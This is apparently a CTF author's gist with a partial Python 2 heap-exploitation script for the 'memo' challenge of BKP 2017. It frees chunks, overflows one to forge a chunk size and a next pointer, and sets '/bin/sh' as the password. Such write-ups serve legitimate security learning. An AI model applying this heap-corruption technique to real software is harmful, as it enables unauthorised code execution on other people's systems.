@P1kachu
Last active March 6, 2017 11:02
First shot at exploiting memo (BKP2017 - pwn 300): the ipynb version drives the binary under gdb, the py version does not
#!/usr/bin/env python2
# Without gdb
import pexpect
import struct
import sys
p = pexpect.spawn('./memo')
p.logfile = sys.stdout
p.setecho(False)
# malloc pointer
# |
# slots: v
# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)
# malloc(2) = 0x603040 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)
# free(2) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)
# free(1) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)
# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0x424242...
# malloc(2) = 0x603040 | ...0x4242... (8 bytes) | ...0x4242... (8 bytes) | 0xDATA (32 bytes)
# malloc(0) = 0x424242.... | 0x0 (8bytes) | 0x1000 (8 bytes) | 0xDATA (LOT OF BYTES)
p.expect("What's user name:")
p.sendline("P1kachu")
p.expect("Do you wanna set password\? \(y/n\)")
p.sendline("y")
p.expect("Password: ")
p.sendline("/bin/sh")
p.expect(">> ")
SIZE=31
# alloc(1)
p.sendline("1")
p.expect("Index: ")
p.sendline("1")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# alloc(2)
p.sendline('1')
p.expect("Index: ")
p.sendline("2")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# free(2)
p.sendline('4')
p.expect("Index: ")
p.sendline("2")
p.expect(">> ")
# free(1)
p.sendline('4')
p.expect("Index: ")
p.sendline("1")
p.expect(">> ")
TOOMUCH=96
NEWSIZE=struct.pack("<Q", 0x20)
NEWPTR=struct.pack("<Q", 0x603060)
ZERO=struct.pack("<Q", 0)
# alloc(1)
p.sendline("1")
p.expect("Index: ")
p.sendline("1")
p.expect("Length: ")
p.sendline(str(TOOMUCH))
p.expect("message too long, you can leave on memo though")
p.sendline(0x20 * 'D' + ZERO + NEWSIZE + NEWPTR)
p.expect(">> ")
# alloc(2)
p.sendline("1")
p.expect("Index: ")
p.sendline("2")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# alloc(0)
p.sendline('1')
p.expect("Index: ")
p.sendline("0")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")